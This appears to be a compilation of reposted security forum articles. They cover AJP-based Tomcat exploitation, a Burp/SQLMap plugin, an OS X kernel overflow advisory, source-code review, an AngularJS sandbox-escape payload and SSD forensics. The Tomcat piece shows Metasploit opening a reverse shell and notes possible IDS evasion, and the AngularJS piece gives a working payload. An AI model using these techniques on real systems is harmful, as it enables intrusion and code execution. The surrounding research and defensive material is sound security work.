# Update this path to match your logs directory location
JkLogFile /var/log/apache2/mod_jk.log
# Set the jk log level [debug/error/info]
JkLogLevel info
# Select the log format
JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
# JkOptions indicate to send SSL KEY SIZE,
JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
# JkRequestLogFormat set the request format
JkRequestLogFormat "%w %V %T"
# Shm log file
JkShmFile /var/log/apache2/jk-runtime-status

sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf

sudo vim /etc/apache2/jk_workers.properties

# Define 1 real worker named ajp13
worker.list=ajp13
# Set properties for worker named ajp13 to use ajp13 protocol,
# and run on port 8009
worker.ajp13.type=ajp13
worker.ajp13.host=localhost
worker.ajp13.port=8009
worker.ajp13.lbfactor=50
worker.ajp13.cachesize=10
worker.ajp13.cache_timeout=600
worker.ajp13.socket_keepalive=1
worker.ajp13.socket_timeout=300

sudo vim /etc/apache2/sites-enabled/000-default

JkMount /* ajp13
JkMount /manager/ ajp13
JkMount /manager/* ajp13
JkMount /host-manager/ ajp13
JkMount /host-manager/* ajp13

sudo a2enmod proxy_ajp
sudo a2enmod proxy_http
sudo /etc/init.d/apache2 restart

Don’t forget to adjust worker.ajp13.host to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place, since the AJP protocol is somewhat binary, but I haven’t verified this. Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system.
Here is the metasploit output also:

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  tomcat           no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST     localhost        yes       The target address
   RPORT     80               yes       The target port
   USERNAME  tomcat           no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.195.156  yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.195.156:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 1648 bytes as XWouWv7gyqklF.war ...
[*] Executing /XWouWv7gyqklF/TlYqV18SeuKgbYgmHxojQm2n.jsp...
[*] Sending stage (36 bytes) to 192.168.195.155
[*] Undeploying XWouWv7gyqklF ...
[*] Command shell session 1 opened (192.168.195.156:4444 -> 192.168.195.155:39401)

id
uid=115(tomcat6) gid=123(tomcat6) groups=123(tomcat6)

References
FAQ/Connectors - Tomcat Wiki
AJPv13
Rajeev Sharma: Configure mod_jk with Apache 2.2 in Ubuntu

Sursa: https://diablohorn.wordpress.com/2011/10/19/8009-the-forgotten-tomcat-port/
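As a footnote to the setup above: the "somewhat binary" AJP protocol is simple enough to frame by hand, which is handy for quickly checking whether port 8009 actually speaks AJP before building the whole mod_jk proxy. A minimal sketch in Python (the helper function is mine; the framing follows the AJPv13 documentation in the references, where packets from the web server to the container start with the magic bytes 0x12 0x34 followed by a two-byte big-endian payload length, and a one-byte CPing payload of 10 should be answered with a CPong):

```python
import struct

AJP_MAGIC = b"\x12\x34"  # prefix for web server -> container packets
CPING = 10               # payload type: ping the servlet container
CPONG = 9                # reply type (container packets start with b"AB")

def ajp_packet(payload: bytes) -> bytes:
    """Frame a payload as an AJP13 web server -> container packet."""
    return AJP_MAGIC + struct.pack(">H", len(payload)) + payload

# Send this over TCP to port 8009 and read 5 bytes back; a reply of
# b"AB\x00\x01\x09" (a CPong) indicates a live AJP connector.
cping = ajp_packet(bytes([CPING]))
print(cping.hex())  # 123400010a
```

Sending that packet with any raw TCP client is a lighter-weight liveness test than the full Apache setup, though of course it does not replace it for actually proxying the metasploit module.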
-
Fedora 21 Alpha Is Out – Screenshot Tour The Fedora 21 Alpha can be downloaded from Softpedia By Silviu Stahie on September 24th, 2014 07:36 GMT The Fedora Project has announced that the first Alpha release for Fedora 21 is now available for download and testing, marking the beginning of a new journey for this famous distribution. The Fedora development team has been trying to get this Alpha release out the door for quite some time and they have been confronted with all sorts of problems that delayed the release. Now it's out and we get to test it properly. Users shouldn't get their hopes up about the final release date: the developers don't have the best track record at keeping a tight schedule for the upcoming builds, so it's very likely that the final iteration will also be pushed back.

It's a new Fedora

Fedora 21 is the first distribution in the series that doesn't have a code name. The previous release was called "Heisenbug." Not many users liked it, so they dropped the naming process entirely. Besides this simple move, the developers have also split the project into Fedora Server, Fedora Cloud, and Fedora Workstation. "The Alpha release contains all the exciting features of Fedora 21's products in a form that anyone can help test. This testing, guided by the Fedora QA team, helps us target and identify bugs. When these bugs are fixed, we make a Beta release available. A Beta release is code-complete and bears a very strong resemblance to the third and final release. The final release of Fedora 21 is expected in December." "We need your help to make Fedora 21 the best release yet, so please take some time to download and try out the Alpha and make sure the things that are important to you are working. If you find a bug, please report it - every bug you uncover is a chance to improve the experience for millions of Fedora users worldwide.
Together, we can make Fedora a rock-solid distribution," say the developers.

Get the Fedora 21 Alpha and test it

As you can see, regular users should be interested in Fedora 21 Workstation, which is basically the desktop edition. The devs are tracking the GNOME 3.14 release and they will integrate it by default. Because the release has been delayed by a few weeks, it will no longer be among the first operating systems to adopt the new version of the GNOME desktop environment. Check the official announcement for more details about this build. You can download Fedora 21 right now from Softpedia. This is a Live CD and it seems to work just fine from a USB drive. If you decide to install it, please don't use a production machine, as the distro is still under development. Sursa: Fedora 21 Alpha Is Out – Screenshot Tour - Softpedia
-
[h=1]SQLiPy: A SQLMap Plugin for Burp[/h] By codewatch On September 22, 2014 · Leave a Comment I perform quite a few web app assessments throughout the year. Two of the primary tools in my handbag for a web app assessment are Burp Suite Pro and SQLMap. Burp Suite is a great general purpose web app assessment tool, but if you perform web app assessments you probably already know that, because you are probably already using it. SQLMap complements Burp Suite nicely with its great SQL injection capabilities. It has astounded me in the past, as flexible and extensible as Burp is, that no one has written a better plugin to integrate the two (or maybe they did and I just missed it). The plugins that I have come across in the past fit in one of two categories: They generate the command line arguments that you want to run, and then you have to copy those arguments to the command line and run SQLMap yourself (like co2); or They kick off a SQLMap scan and essentially display what you would see if run in a console window (like gason) I’m not much of a developer, so I never really considered attempting to integrate the two myself until the other day, when I was browsing the SQLMap directory on my machine and noticed the file sqlmapapi.py. I’d never noticed it before (I’m not sure why), but when I did I immediately started looking into the purpose of the script. The sqlmapapi.py file is essentially a web server with a RESTful interface that enables you to configure, start, stop, and get the results from SQLMap scans by passing it options via JSON requests. This immediately struck me as an easy way in which to integrate Burp with SQLMap. I began researching the API and was very fortunate that someone already did the leg work for me. The following blog post outlines the API: Volatile Minds: Unofficial SQLmap RESTful API documentation. Once I had the API down I set out to write the plugin.
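For orientation, the calls involved in driving sqlmapapi.py look roughly like this. This is only a sketch based on the unofficial API documentation mentioned above, assuming the default 127.0.0.1:8775 listener; the taskid and target URL are invented, and option names may differ between sqlmap versions:

```python
import json

API = "http://127.0.0.1:8775"  # sqlmapapi.py default listen address

def new_task_url():
    # GET this to receive {"taskid": "..."} for a fresh scan task
    return API + "/task/new"

def start_scan_request(taskid, target_url):
    """Build the (url, JSON body) pair for POST /scan/<taskid>/start."""
    body = json.dumps({"url": target_url}).encode()
    return API + "/scan/" + taskid + "/start", body

def status_url(taskid):
    # GET this; a "terminated" status means the scan has finished
    return API + "/scan/" + taskid + "/status"

def data_url(taskid):
    # GET this after the scan terminates to retrieve any findings
    return API + "/scan/" + taskid + "/data"

url, body = start_scan_request("abcd1234", "http://target/item.php?id=1")
print(url)  # http://127.0.0.1:8775/scan/abcd1234/start
```

Driving these endpoints with any HTTP client reproduces the create/start/poll/collect cycle that a Burp-side integration has to automate.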
The key features that I wanted to integrate were: The ability to start the API from within Burp. Note that this is not recommended, as one of the limitations of Jython is that when you start a process with popen, you can’t get the PID, which means you can’t stop the process from within Jython (you have to manually kill it). A context menu option for sending a request in Burp to the plugin. A menu for editing and configuring the request prior to sending to SQLMap. A thread that continuously checks up on executed scans to identify whether there were any findings. Addition of information enumerated from successful SQLMap scans to the Burp Scanner Results list. All of those features have been integrated into this first release. I have limited ability to test, so I appreciate anyone who can use the plugin and provide feedback. Some general notes on the plugin development: This is the first time I’ve attempted to develop a Burp plugin. The fact that I was able to do so with relative ease shows how easy the Burp guys have made it. This is also the first time I’ve used Jython, or used any Java GUI code. The code probably looks awful and I need more comments. See points 1 & 2 above and add in the fact that I’m not a developer. I reviewed the source code for numerous plugins to help me understand the nuances of working with Python/Jython/Java and integrating with Burp. The source of the following plugins was reviewed to help me understand how to build this: Payload Parser Burp SAML ActiveScan++ WCF Binary SOAP Handler WSDL Wizard co2 Full article: https://www.codewatch.org/blog/?p=402
-
OS X IOKit kernel code execution due to integer overflow in IODataQueue::enqueue

The class IODataQueue is used in various places in the kernel. There are a couple of exploitable integer overflow issues in the ::enqueue method:

Boolean IODataQueue::enqueue(void * data, UInt32 dataSize)
{
    const UInt32 head = dataQueue->head; // volatile
    const UInt32 tail = dataQueue->tail;
    const UInt32 entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;   <-- (a)
    IODataQueueEntry * entry;

    if ( tail >= head )
    {
        // Is there enough room at the end for the entry?
        if ( (tail + entrySize) <= dataQueue->queueSize )               <-- (b)
        {
            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
            entry->size = dataSize;
            memcpy(&entry->data, data, dataSize);                       <-- (c)

The additions at (a) and (b) should be checked for overflow. In both cases, by supplying a large value for dataSize an attacker can reach the memcpy call at (c) with a length argument which is larger than the remaining space in the queue buffer. The majority of this PoC involves setting up the conditions to actually be able to reach a call to ::enqueue with a controlled dataSize argument; the bug itself is quite simple. This PoC creates an IOHIDLibUserClient (IOHIDPointingDevice) and calls the create_queue externalMethod to create an IOHIDEventQueue (which inherits from IODataQueue.) This is the queue which will have the ::enqueue method invoked with the large dataSize argument. The PoC then calls IOConnectMapMemory with a memoryType argument of 0 which maps an array of IOHIDElementValues into userspace:

typedef struct _IOHIDElementValue {
    IOHIDElementCookie cookie;
    UInt32 totalSize;
    AbsoluteTime timestamp;
    UInt32 generation;
    UInt32 value[1];
} IOHIDElementValue;

The first dword of the mapped memory is a cookie value and the second is a size.
When the IOHIDElementPrivate::processReport method is invoked (in response to an HID event), if there are any listening queues then the IOHIDElementValue will be enqueued - and the size is in shared memory. The PoC calls the startQueue selector to start the listening queue then calls addElementToQueue passing the cookie for the first IOHIDElementValue and the ID of the listening queue. A loop then overwrites the totalSize field of the IOHIDElementValue in shared memory with 0xfffffffe. When the processReport method is called this will call IODataQueue::enqueue and overflow the calculation of entry size such that it will attempt to memcpy 0xfffffffe bytes. Note that the size of the queue buffer is also attacker controlled, and the kernel is 64-bit, so a 4gb memcpy is almost certainly exploitable. Note that lldb seems to get confused by the crash - the memcpy implementation uses rep movsq and lldb doesn't seem to understand the 0xf3 (rep) prefix - IDA disassembles the function fine though. Also the symbols for memcpy and real_mode_bootstrap_end seem to have the same address so the lldb backtrace looks weird, but it is actually memcpy. hidlib_enqueue_overflow.c 6.7 KB Download Sursa: https://code.google.com/p/google-security-research/issues/detail?id=39
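As an addendum, the 32-bit wraparound that the 0xfffffffe totalSize triggers is easy to reproduce outside the kernel. A small Python simulation of the entry-size computation and the bounds check (the header size of 8 is an illustrative stand-in for DATA_QUEUE_ENTRY_HEADER_SIZE, not the exact kernel constant):

```python
MASK32 = 0xFFFFFFFF

def u32(x):
    """Emulate UInt32 arithmetic, which silently wraps modulo 2**32."""
    return x & MASK32

DATA_QUEUE_ENTRY_HEADER_SIZE = 8   # illustrative value
queue_size = 0x1000                # queue buffer size (also attacker-influenced)
tail = 0x10
data_size = 0xFFFFFFFE             # the totalSize written into shared memory

entry_size = u32(data_size + DATA_QUEUE_ENTRY_HEADER_SIZE)  # wraps to 6
bounds_ok = u32(tail + entry_size) <= queue_size            # 0x16 <= 0x1000

# The bounds check passes with the tiny wrapped entry_size, yet the
# subsequent memcpy still uses the original data_size of 0xFFFFFFFE bytes.
print(entry_size, bounds_ok)  # 6 True
```

This is why the fix is to validate the additions themselves, not just the final comparison: once the 32-bit sum has wrapped, every later check sees a small, plausible-looking value.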
-
[h=3]5 Vulnerabilities That Surely Need a Source Code Review[/h] We have been performing Source Code Review (SCR) of multiple Java/JavaEE based Web Applications during the recent past. The results have convinced us and the customers that SCR is a valuable exercise that must be performed for business critical applications in addition to Penetration Testing. In terms of vulnerabilities, SCR has the potential to find some of the vulnerability classes that an Application Penetration Test will usually miss. In this article we will provide a brief overview of some of the vulnerability classes which we frequently discover during an SCR that are missed or very difficult to identify during Penetration Testing. Additionally we hope we will be able to provide answers for the following commonly asked questions: I have already performed an Application Penetration Test. Do I still need to conduct a Source Code Review for the same application? What are the vulnerabilities found during Source Code Review that are often missed by an Application Penetration Test? Read More: Web Application Penetration Testing Service [h=3]Approach for Source Code Review[/h] The approach for SCR is fundamentally different from an Application Penetration Test. While an Application Penetration Test is driven by apparently visible use-cases and functionalities, the maximum possible view of the application in terms of its source code and configuration is usually available during an SCR. Apart from auditing important use-cases following standard practices, our approach consists of two broad steps: [h=4]Finding Security Weaknesses (Insecure/Risky Code Blocks) (Sinks)[/h] A security weakness is an insecure practice or a dangerous API call or an insecure design.
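A classic sink of this kind is a dynamically built SQL query, and it is easiest to see why it is a weakness next to its fix. A self-contained sketch (SQLite stands in for the real database here; the table and the values are invented for the demo):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
db.execute("INSERT INTO items VALUES ('alice', 'secret-report')")

user = "nobody' OR '1'='1"   # untrusted input reaching the sink

# Weakness: the input is concatenated into the query text, so the
# injected OR clause becomes part of the SQL and matches every row
leaked = db.execute(
    "SELECT * FROM items WHERE owner = '" + user + "'").fetchall()

# Fix: a bound parameter keeps the input as data, never as SQL
safe = db.execute(
    "SELECT * FROM items WHERE owner = ?", (user,)).fetchall()

print(leaked)  # [('alice', 'secret-report')]
print(safe)    # []
```

During a review, spotting the concatenation pattern flags the weakness; whether it is an actual vulnerability then depends on tracing a user-controlled source into that query, which is exactly the correlation step described below.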
Some examples of weaknesses are: Dynamic SQL Query: string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'"; Dangerous or risky API call such as Runtime.exec, Statement.execute Insecure Design such as using only MD5 hashing of passwords without any salt. [h=4]Correlation between Security Weakness and Dynamic Input[/h] Dynamic construction of an SQL Query without the necessary validation or sanitization is definitely a security weakness, however it may not lead to a security vulnerability if the SQL query does not involve any untrusted data. Hence it is required to identify code paths that start with a user input and reach a possibly weak or risky code block. The absence of this phase will leave a huge number of false positives in the results. This step generally involves enumerating sources and finding a path between source and sink. A source in this case is any user controlled and untrusted input e.g. HTTP request parameters, cookies, uploaded file contents etc. [h=3]Five Vulnerabilities Source Code Review should Find[/h] [h=4]1. Insecure or Weak Cryptographic Implementation[/h] SCR is a valuable exercise to discover weak or below standard cryptography techniques used in applications such as: Use of MD5 or SHA1 without salt for password hashing. Use of Java Random instead of SecureRandom. Use of weak DES encryption. Use of weak mode of otherwise strong encryption such as AES with ECB. Susceptibility to Padding Oracle Attack. [h=4]2. Known Vulnerable Components[/h] For a small-medium scale JavaEE based application, 80% of the code that is executed at runtime comes from libraries. The actual percentage for a given application can be identified by referencing the Maven POM file, IVY dependency file or looking into the lib directory. It is a very common possibility for dependent libraries and framework components to have known vulnerabilities, especially if the application is developed over a considerable time frame.
As an example, during 2011, the following two vulnerable components were downloaded 22 million times: Apache CXF with Authentication Bypass Vulnerability Spring Framework with Remote Code Execution Vulnerability During an SCR, known vulnerable components are easier to detect due to source code access and knowledge of the exact version number of various libraries and framework components used, something that is lacking during an Application Penetration Test. [h=4]3. Sensitive Information Disclosure[/h] An SCR should discover if an application in binary (jar/war) or source code form may disclose sensitive information that may compromise the security of the production environment. Some of the commonly seen cases are: Logs: Application logs sensitive information such as credentials or access keys in log files. Configuration Files: Application discloses sensitive information such as shared secrets or passwords in plain text configuration files. Hardcoded Passwords and Keys: Many applications depend on encryption keys that are hardcoded within the source code. If an attacker manages to obtain even a binary copy of the application, it is possible to extract the key and hence compromise the security of the sensitive data. Email address of Developers in Comments: A minor issue, but hardcoded email addresses and names of developers can provide valuable information to attackers to launch social engineering or spear phishing attacks. [h=4]4. Insecure Functionalities[/h] An enterprise application usually goes through various transformations and releases. The application might have legacy functionality with security implications. An SCR should be able to find such legacy functionality and identify its security implications. Some of the examples of legacy functionalities with known security issues are given below: RMI calls over insecure channel. Kerberos implementations that are vulnerable to replay attack. Legacy authentication & authorization techniques with known weaknesses.
J2EE bad practices such as direct management of database/resource connections that may lead to a Denial of Service. Race condition bugs. [h=4]5. Security Misconfiguration[/h] SCR should be able to find common security misconfigurations in the application and its deployed environment related to database configuration, frameworks, application containers etc. Some of the commonly discovered issues include: Application containers and database servers are running with the highest (unnecessary) privilege. Default accounts with password enabled and unchanged. Insecure local file storage. [h=3]Additional Notes[/h] An in-depth Source Code Review exercise is a valuable activity that has significant additional benefits apart from those mentioned above. It is possible to conduct an in-depth review of the implementation of security controls such as Cross-site Request Forgery (CSRF) prevention, Cross-site Scripting (XSS) prevention, SQL Injection prevention etc. It is not uncommon to find code that lacks or misuses such controls in a vulnerable manner, resulting in a bypass of the protection. There are multiple APIs that are considered to be risky or insecure as per various secure coding guidelines. It is possible to discover usage of such APIs in a given application easily and quickly during an SCR process. SCR has the added benefit of being non-disruptive, i.e. this activity does not require access to the production environment and will not cause any service disruption. Source Code Review (SCR) is a valuable technique to discover vulnerabilities in your Enterprise Application. It discovers certain classes of vulnerabilities which are difficult to find by conventional Application Penetration Testing. However, it must be noted that Application Penetration Testing and Source Code Review are complementary in many ways and both independently contribute to enhancing the overall security of the application and infrastructure. Sursa: 5 Vulnerabilities That Surely Need a Source Code Review
Yes. "If you compare a pointer to a function with a number, I automatically convert them to strings and compare them as character strings" - JavaScript. Because fuck logic, that's why.
-
___ __ _______ _____ ____ __ / | ____ ____ ___ __/ /___ ______ / / ___/ / ___/____ _____ ____/ / /_ ____ _ __ / /_ __ ______ ____ ___________ / /| | / __ \/ __ `/ / / / / __ `/ ___/_ / /\__ \ \__ \/ __ `/ __ \/ __ / __ \/ __ \| |/_/ / __ \/ / / / __ \/ __ `/ ___/ ___/ / ___ |/ / / / /_/ / /_/ / / /_/ / / / /_/ /___/ / ___/ / /_/ / / / / /_/ / /_/ / /_/ /> < / /_/ / /_/ / /_/ / /_/ (__ |__ ) /_/ |_/_/ /_/\__, /\__,_/_/\__,_/_/ \____//____/ /____/\__,_/_/ /_/\__,_/_.___/\____/_/|_| /_.___/\__, / .___/\__,_/____/____/ /____/ /____/_/

In my recent research I discovered a bypass to the AngularJS "sandbox", allowing me to execute arbitrary JavaScript from within the Angular scope, while not breaking any of the implemented rules (eg. Function constructor can't be accessed directly). The main reason I was allowed to do this is because functions executing callbacks, such as Array.sort(), Array.map() and Array.filter(), are allowed. If we use the Function constructor as callback, we can carefully construct a payload that generates a valid function where we control both the arguments and the function body. This results in a sandbox bypass. Example:

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

JSFiddle: http://jsfiddle.net/uwwov8oz

Let's break that down. The Function constructor can be accessed via toString.constructor.

{{Function.prototype.toString=Function.prototype.call;["a","alert(1)"].sort(Function)}}

We can run the Function constructor with controlled arguments with ["a", "alert(1)"].sort(Function). This will generate this pseudo-code:

if(Function("a","alert(1)") > 1){
    //Sort element "a" as bigger than "alert(1)"
}else if(Function("a","alert(1)") < 1){
    //Sort element "a" as smaller than "alert(1)"
}else{
    // Sort elements as same
}

Function("a","alert(1)") is equivalent to function(a){alert(1)}. So let's edit that.
if((function(a){alert(1)}) > 1){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}) < 1){
    //Sort element "a" as smaller than "alert(1)"
}else{
    // Sort elements as same
}

Now, to understand the next part we must know how the JS internals handle comparison of functions. They will convert the function to a string using the toString method (inherited from Object) and compare it as a string. We can show this by running this code: alert==alert.toString().

if((function(a){alert(1)}).toString() > 1..toString()){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}).toString() < 1..toString()){
    //Sort element "a" as smaller than "alert(1)"
}else{
    // Sort elements as same
}

So to sum up: We can create a function where we control the arguments ("a"), as well as the function body ("alert(1)"), and that generated function will be converted to a string using the toString() function. So all we have to do is replace the Function.prototype.toString() function with the Function.prototype.call() function, and when the comparison runs in the pseudocode, it will run like this:

if((function(a){alert(1)}).call() > 1..toString()){
    //Sort element "a" as bigger than "alert(1)"
}else if((function(a){alert(1)}).call() < 1..toString()){
    //Sort element "a" as smaller than "alert(1)"
}else{
    // Sort elements as same
}

Since (function(a){alert(1)}).call() is a perfectly valid way of creating and executing a function, and given that we control both the arguments and the function body, we can safely assume that we can execute arbitrary JavaScript using this method. The same logic can be applied to the other callback functions. I'm not really sure why using the constructor property like this (eg. toString.constructor) works, since it didn't in 1.2.18 and down. Last, this is now fixed as of AngularJS version 1.2.24 and up (only 1 week from original report until patch!)
and I got $5000 bug bounty for this bypass Changelog: https://github.com/angular/angular.js/commit/b39e1d47b9a1b39a9fe34c847a81f589fba522f8 over and out, avlidienbrunn Video: Sursa: http://avlidienbrunn.se/angular.txt
-
Recovering Evidence from SSD Drives in 2014: Understanding TRIM, Garbage Collection and Exclusions Posted by belkasoft ? September 23, 2014 We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives. Introduction Several years ago, Solid State drives (SSD) introduced a challenge to digital forensic specialists. Forensic acquisition of computers equipped with SSD storage became very different compared to acquisition of traditional hard drives. Instead of straightforward and predictable recovery of evidence, we are in the waters of stochastic forensics with SSD drives, where nothing can be assumed as a given. With even the most recent publications not going beyond introducing the TRIM command and making a conclusion on SSD self-corrosion, it has been common knowledge – and a common misconception, – that deleted evidence cannot be extracted from TRIM-enabled SSD drives, due to the operation of background garbage collection. However, there are so many exceptions that they themselves become a rule. TRIM does not engage in most RAID environments or on external SSD drives attached as a USB enclosure or connected via a FireWire port. TRIM does not function in a NAS. Older versions of Windows do not support TRIM. In Windows, TRIM is not engaged on file systems other than NTFS. There are specific considerations for encrypted volumes stored on SSD drives, as various crypto containers implement vastly different methods of handling SSD TRIM commands. 
And what about slack space (which has a new meaning on an SSD) and data stored in NTFS MFT attributes? Different SSD drives handle after-TRIM reads differently. Firmware bugs are common in SSD drives, greatly affecting evidence recoverability. Finally, the TRIM command is not issued (and garbage collection does not occur) in the case of data corruption, for example, if the boot sector or partition tables are physically wiped. Self-encrypting SSD drives require a different approach altogether, while SSD drives using compressing controllers cannot be practically imaged with off-chip acquisition hardware. Our new research covers many areas where evidence is still recoverable – even on today’s TRIM-enabled SSD drives.

SSD Self-Corrosion

In case you haven’t read our 2012 paper on SSD forensics, let’s briefly review why SSD forensics is different. The operating principle of SSD media (as opposed to magnetic or traditional flash-based storage) allows access to existing information (files and folders) stored on the disk. Deleted files, and data that a suspect attempted to destroy (e.g. by formatting the disk, even with “Quick Format”), may be lost forever in a matter of minutes. Even shutting the affected computer down immediately after a destructive command has been issued does not stop the destruction. Once the power is back on, the SSD drive will continue wiping its content clean all by itself, even if installed in a write-blocking imaging device. If a self-destruction process has already started, there is no practical way of stopping it, unless we’re talking about some extremely important evidence, in which case the disk, accompanied by a court order, can be sent to the manufacturer for low-level, hardware-specific recovery. The evidence self-destruction process is triggered by the TRIM command issued by the operating system to the SSD controller at the time the user deletes a file, formats the disk or deletes a partition.
The TRIM operation is fully integrated with partition- and volume-level commands. This includes formatting the disk or deleting partitions; file system commands responsible for truncating and compressing data; and System Restore (Volume Snapshot) operations. Note that the data destruction process is only triggered by the TRIM command, which must be issued by the operating system. However, in many cases the TRIM command is NOT issued. In this paper, we concentrate on these exclusions, allowing investigators to gain a better understanding of situations in which deleted data can still be recovered from an SSD drive. Before we begin that part, let’s see how SSD drives of 2014 differ from SSD drives made in 2012.

Checking TRIM Status

When analyzing a live system, it is easy to check the TRIM status for a particular SSD device by issuing the following command in a terminal window:

fsutil behavior query disabledeletenotify

You’ll get one of the following results:

DisableDeleteNotify = 1, meaning that Windows TRIM commands are disabled
DisableDeleteNotify = 0, meaning that Windows TRIM commands are enabled

fsutil is a standard tool in Windows 7, 8, and 8.1. On a side note, it is possible to enable TRIM with “fsutil behavior set disabledeletenotify 0” or disable TRIM with “fsutil behavior set disabledeletenotify 1”.

Figure 1: TRIM, image taken from http://www.corsair.com/us/blog/how-to-check-that-trim-is-active/

Note that using this command only makes sense when analyzing an SSD that is still installed in its original computer (e.g. during a live box analysis). If the SSD drive is moved to a different system, the results of this command are no longer relevant.

SSD Technology: 2014

Back in 2012, practically all SSD drives were already equipped with background garbage collection technology and recognized the TRIM command. This has not changed in 2014. Two years ago, SSD compression already existed in SandForce SSD controllers (http://en.wikipedia.org/wiki/SandForce).
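On a live Windows box, the fsutil check above is easy to script. Below is a minimal sketch (the helper names are our own, not part of any toolkit) that runs the command and interprets the flag; note that fsutil requires an elevated prompt:

```python
import subprocess

def trim_enabled_from_output(output: str) -> bool:
    """Interpret `fsutil behavior query disabledeletenotify` output.
    DisableDeleteNotify = 0 means Windows DOES issue TRIM commands."""
    for line in output.splitlines():
        if "DisableDeleteNotify" in line:
            # Take the value right after the "=" sign.
            value = line.split("=")[1].strip().split()[0]
            return value == "0"
    raise ValueError("unexpected fsutil output")

def query_trim_status() -> bool:
    """Run fsutil on a live Windows system (requires admin rights)."""
    result = subprocess.run(
        ["fsutil", "behavior", "query", "disabledeletenotify"],
        capture_output=True, text=True, check=True,
    )
    return trim_enabled_from_output(result.stdout)
```

As the article stresses, this check is only meaningful while the SSD is still installed in its original computer.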
However, relatively few models were equipped with encrypting or compressing controllers. As SandForce was the only compressing controller, it was easy to determine whether compression was in play (http://www.enterprisestorageforum.com/technology/features/article.php/3930601/Real-Time-Data-Compressions-Impact-on–SSD-Throughput-Capability-.htm). In 2013, Intel used a custom-firmware version of a SandForce controller to implement data compression in its 3xx and 5xx series SSDs (http://www.intel.com/support/ssdc/hpssd/sb/CS-034537.htm), claiming reduced write amplification and increased endurance of the SSD as the inherent benefits (http://www.intel.de/content/dam/www/public/us/en/documents/technology-briefs/ssd-520-tech-brief.pdf). Marvell controllers are still non-compressing (http://blog.goplextor.com/?p=3313), and so are most other controllers on the market, including the new budget option, Phison.

Why so much fuss about data compression in SSD drives? Because the use of any technology that alters binary data before it ends up in the flash chips makes recovery with third-party off-chip hardware much more difficult. Regardless of whether compression is present, we have not seen many successful implementations of SSD off-chip acquisition products so far, TEEL Tech (http://www.teeltech.com/mobile-device-forensics-training/advanced-bga-chip-off-forensics/) being one of the rare exceptions.

Let’s conclude this chapter with a quote from PC World: “The bottom line is that SSDs still are a capacity game: people buy the largest amount of storage they can within their budget, and they ignore the rest.” (http://www.pcworld.com/article/2087480/ssd-prices-face-uncertain-future-in-2014.html) In other words, SSDs get bigger and cheaper, inevitably demanding cost-saving measures which, in turn, may affect how deleted data is handled on these drives, as described later in the Reality Steps In: Why Real SSDs are Often Recoverable chapter.
SSD Manufacturers

In recent years, we’ve seen a lot of new SSD “manufacturers” entering the arena. These companies don’t normally build their own hardware or design their own firmware. Instead, they simply spec out the disks to a real manufacturer that assembles the drives based on one or another platform (typically SandForce or Phison) and one or another type, make and size of flash memory. In the context of SSD forensics, these drives are of interest exactly because they all feature a limited choice of chipsets and a limited number of firmware revisions. In fact, just two chipset makers, SandForce and Phison, enabled dozens of “manufacturers” to make hundreds of nearly indistinguishable SSD models. So who are the real makers of SSD drives? According to Samsung, we have the following picture: (Source: http://www.kitguru.net/components/ssd-drives/anton-shilov/samsung-remains-the-worlds-largest-maker-of-ssds-gartner/)

Hardware for SSD Forensics (and Why It Has Not Arrived)

Little has changed since 2012 with regard to SSD-specific acquisition hardware. Commonly available SATA-compliant write-blocking forensic acquisition hardware is used predominantly to image SSD drives, while BGA flash chip acquisition kits remain as rare as hen’s teeth. Why so few chip-off solutions for SSD drives compared to the number of companies doing mobile chip-off? It’s hard to say for sure, but it’s possible that most digital forensic specialists are happy with what they can extract via the SATA link (while there is no similar interface in most mobile devices). Besides, internal data structures in today’s SSD drives are extremely complex. Constant remapping and shuffling of data during performance and lifespan optimization routines leave the actual data content stored on the flash chips inside SSD drives heavily fragmented.
We’re not talking about logical fragmentation on the file system level (which is already a problem, as SSD drives are never logically defragmented), but rather physical fragmentation that makes an SSD controller scatter data blocks belonging to a contiguous file across various physical addresses on numerous physical flash chips. Such massive parallel writes are exactly what makes SSD drives so much faster than traditional magnetic drives (as opposed to the sheer writing speed of single flash chips). One more word regarding SSD acquisition hardware: write-blocking devices. Note that write-blocking imaging hardware does not stop SSD self-corrosion. If the TRIM command has been issued, the SSD drive will continue erasing released data blocks at its own pace. Whether or not some remnants of deleted data can be acquired from the SSD drive depends as much on acquisition technique (and speed) as on the particular implementation of a particular SSD controller.

Deterministic Read After Trim

